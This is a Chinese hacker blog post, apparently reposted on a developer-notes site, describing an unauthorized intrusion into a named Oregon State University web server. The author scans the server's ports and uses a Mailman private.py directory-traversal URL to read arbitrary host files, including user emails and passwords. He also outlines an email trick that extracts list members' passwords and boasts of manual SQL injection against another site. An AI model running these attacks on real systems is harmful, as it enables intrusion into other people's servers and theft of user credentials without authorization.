热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

简述某次拿下外国大学网站

这次说个端口的。很多人觉得X-Scan过时了,几乎没有人用X-Scan了。如果某些小黑兴起,想搞下国外网站,不是拿着小黑、明小子一顿乱扫就是工具的狂轰。一点技术含量都没有,实在让人无奈。前几天还是前几个小时,tank还问我,怎么php的手工注入语句那么简单

这次说个端口的。

    很多人觉得X-Scan过时了,几乎没有人用X-Scan了。如果某些小黑兴起,想搞下国外网站,不是拿着小黑、明小子一顿乱扫就是工具的狂轰。一点技术含量都没有,实在让人无奈。

    前几天还是前几个小时,tank还问我,怎么php的手工注入语句那么简单?我说样子简单不代表难度简单。在中国,只要是存在注入点的网站几乎都被入侵遍 了,但是细数他们的手法,还是工具,或者是泛滥的0day。再看一个实际点的。今晚碰上一个有注入点的asp网站。但是用工具扫,全错误。那些用工具的小 黑们,我只想说我瞧不起你们。这种情况我用原始的手工asp注入,联合查询,大约二十分钟,密码出来了。

    进去,网站干干净净,没被入侵过……无奈、、、、、

    说实话,这个手工asp联合查询注入并不难,三张图四个url结束战斗,居然。、。、、呵呵。

    闲话休扯,回到正题。

    今晚和小白搞美国的edu,说说其中的一个例子。

    ne.oregonstate.edu

    简单扫了下服务器,发现开着

    www:443

    www:8000

    ftp:21

    www:80

    ssh:22

    这几个端口,我对使用www协议的443端口很好奇,于是访问:

    http://ne.oregonstate.edu:443结果出错了……晕。再一想,呵呵,是https

    https://ne.oregonstate.edu就看到界面了

    输入https://ne.oregonstate.edu/robots.txt

    看到这些东西:

    User-agent: *

    Disallow: /administrator/

    Disallow: /cache/

    Disallow: /components/

    Disallow: /images/

    Disallow: /includes/

    Disallow: /installation/

    Disallow: /language/

    Disallow: /libraries/

    Disallow: /media/

    Disallow: /modules/

    Disallow: /plugins/

    Disallow: /templates/

    Disallow: /tmp/

    Disallow: /xmlrpc/

    Disallow: /*?

    Disallow: /*/resources/

    Disallow: /classes/eecs/fall2009/cs515/

   

    访问目录administrator无效。显然根据第一幅图,这是个新建的ssl网站。

    好吧,终于打开的X-Scan(下载地址:http://www.heibai.net/download/Soft/Soft_3870.htm),扫,漏洞,maiman

    很多人不喜欢用X-Scan的原因是X-Scan是款检测软件而不是入侵软件。其实这种软件比入侵软件有深度,更难得,让人学会分析,让人不会迷失在工具中成为一个真正的傻瓜。

    检测报告是这么说的:

    Mailman private.py 目录跳转漏洞

    目标主机运行着 Mailman 邮件列表服务

    其存Cgi/private.py存在目录跳转漏洞。 该漏洞在当Web服务没有过滤URL上额外的斜杠时会出现如 Apache 1.3.x,漏洞导致允许列表上的用户利用特殊的web请求,以web服务的权限获取主机上的任意文件, 包括储存在主机上的任意用户的 email 地址,密码

    ***** Nessus 探测该主机存在此漏洞

    ***** 通过安装在该主机上的 Mailman版本号

    **** .

    参见: http://lists.netsys.com/pipermail/full-disclosure/2005-February/031562.html

  &nb

sp; 解决方案 : 尽快更新至 Mailman 2.1.6 或通过前面url中的描述进行修补

    风险等级 : 高

    X-Scan中文没有测试地址。实际的测试地址是:

    http://$target/mailman/private/$listname/…/…///mailman?username=$user&password=$pass

    换成实际网站就是

    https://ne.oregonstate.edu/mailman/private/$listname/…/…///mailman?username=$user&password=$pass

    不过提示列表错误。

    下面要做的就是猜邮件列表。跟注入猜表段是一样的

    https://ne.oregonstate.edu/mailman/private/$listname/…/…///mailman?username=$user&password=$pass

    里面的$listname换掉,换成表名,我猜admin、root、newlist猜了半天,看配置方法:

1 安装邮件列表程序

    apt-get install mailman

    2 修改配置 /etc/mailman/mm_cfg.py 此服务器采用exim4作为邮件服务

    DEFAULT_EMAIL_HOST = 'lists.mydomain.com'

    DEFAULT_URL_HOST = 'www.mydomain.com'

    MTA = None

3 添加默认的邮件列表  newlist mailman

    默认是mailman,输入mailman试试

    https://ne.oregonstate.edu/mailman/private/mailman/…/…///mailman?username=$user&password=$pass

    居然成功了……郁闷死……

    下面就是把任意一个存在的用户名和密码带入url里面的&user和$pass带进去,就可以

    以web服务的权限获取主机上的任意文件, 包括储存在主机上的任意用户的 email 地址,密码

    至于后台“找回密码”,数据库XX等等,随你自己好了。

    不过猜密码貌似也不是很难,虽然我还没成功。今天已经凌晨五点了。,扛不住了

    Mailman密码遍历

    这个目标漏洞存在于运行Mailman邮件列表软件的版本

    允许一个列表用户遍历任何一个其他用户的密码

    通过向服务器发送特别制作的邮件信息的途径。

    发送给$listnamerequest@target一个消息,包括一下几行:

    password address=$victim

    password address=$subscriber

   

    将返回列表$listname的为$victim和$subscriber的密码。

    注意:Nessus已经确定这个攻击仅存在于通过查看目标机器上安装的Mailman版本号的方式。

    $list已经猜出来了……

    我承认这些都是建立在别人基础上的。不过总好过被人说烂了的注入攻击还有什么乱七八糟的要强吧?至少我觉得很锻炼人的渗透和分析能力。

    而其技术含量总好过那些整天拿着asp网站不放的文章要好的多吧?

 


推荐阅读
  • 如何实现织梦DedeCms全站伪静态
    本文介绍了如何通过修改织梦DedeCms源代码来实现全站伪静态,以提高管理和SEO效果。全站伪静态可以避免重复URL的问题,同时通过使用mod_rewrite伪静态模块和.htaccess正则表达式,可以更好地适应搜索引擎的需求。文章还提到了一些相关的技术和工具,如Ubuntu、qt编程、tomcat端口、爬虫、php request根目录等。 ... [详细]
  • 本文介绍了在开发Android新闻App时,搭建本地服务器的步骤。通过使用XAMPP软件,可以一键式搭建起开发环境,包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表,并设置相应的属性。最后,给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]
  • mac php错误日志配置方法及错误级别修改
    本文介绍了在mac环境下配置php错误日志的方法,包括修改php.ini文件和httpd.conf文件的操作步骤。同时还介绍了如何修改错误级别,以及相应的错误级别参考链接。 ... [详细]
  • 一句话解决高并发的核心原则
    本文介绍了解决高并发的核心原则,即将用户访问请求尽量往前推,避免访问CDN、静态服务器、动态服务器、数据库和存储,从而实现高性能、高并发、高可扩展的网站架构。同时提到了Google的成功案例,以及适用于千万级别PV站和亿级PV网站的架构层次。 ... [详细]
  • 本文介绍了互联网思维中的三个段子,涵盖了餐饮行业、淘品牌和创业企业的案例。通过这些案例,探讨了互联网思维的九大分类和十九条法则。其中包括雕爷牛腩餐厅的成功经验,三只松鼠淘品牌的包装策略以及一家创业企业的销售额增长情况。这些案例展示了互联网思维在不同领域的应用和成功之道。 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • Tomcat安装与配置教程及常见问题解决方法
    本文介绍了Tomcat的安装与配置教程,包括jdk版本的选择、域名解析、war文件的部署和访问、常见问题的解决方法等。其中涉及到的问题包括403问题、数据库连接问题、1130错误、2003错误、Java Runtime版本不兼容问题以及502错误等。最后还提到了项目的前后端连接代码的配置。通过本文的指导,读者可以顺利完成Tomcat的安装与配置,并解决常见的问题。 ... [详细]
  • 本文由编程笔记#小编为大家整理,主要介绍了markdown[软件代理设置]相关的知识,希望对你有一定的参考价值。 ... [详细]
  • 本文介绍了通过ABAP开发往外网发邮件的需求,并提供了配置和代码整理的资料。其中包括了配置SAP邮件服务器的步骤和ABAP写发送邮件代码的过程。通过RZ10配置参数和icm/server_port_1的设定,可以实现向Sap User和外部邮件发送邮件的功能。希望对需要的开发人员有帮助。摘要长度:184字。 ... [详细]
  • 如何在服务器主机上实现文件共享的方法和工具
    本文介绍了在服务器主机上实现文件共享的方法和工具,包括Linux主机和Windows主机的文件传输方式,Web运维和FTP/SFTP客户端运维两种方式,以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外,还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK,以及主机迁移服务会收集的源端服务器信息。 ... [详细]
  • 本文介绍了在Windows环境下如何配置php+apache环境,包括下载php7和apache2.4、安装vc2015运行时环境、启动php7和apache2.4等步骤。希望对需要搭建php7环境的读者有一定的参考价值。摘要长度为169字。 ... [详细]
  • 延迟注入工具(python)的SQL脚本
    本文介绍了一个延迟注入工具(python)的SQL脚本,包括使用urllib2、time、socket、threading、requests等模块实现延迟注入的方法。该工具可以通过构造特定的URL来进行注入测试,并通过延迟时间来判断注入是否成功。 ... [详细]
  • 原理:dismiss再弹出,把dialog设为全局对象。if(dialog!null&&dialog.isShowing()&&!(Activity.)isFinishing()) ... [详细]
  • 本文介绍了一个免费的asp.net控件,该控件具备数据显示、录入、更新、删除等功能。它比datagrid更易用、更实用,同时具备多种功能,例如属性设置、数据排序、字段类型格式化显示、密码字段支持、图像字段上传和生成缩略图等。此外,它还提供了数据验证、日期选择器、数字选择器等功能,以及防止注入攻击、非本页提交和自动分页技术等安全性和性能优化功能。最后,该控件还支持字段值合计和数据导出功能。总之,该控件功能强大且免费,适用于asp.net开发。 ... [详细]
  • .htaccess文件 ... [详细]
author-avatar
shanfeng0828_589
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有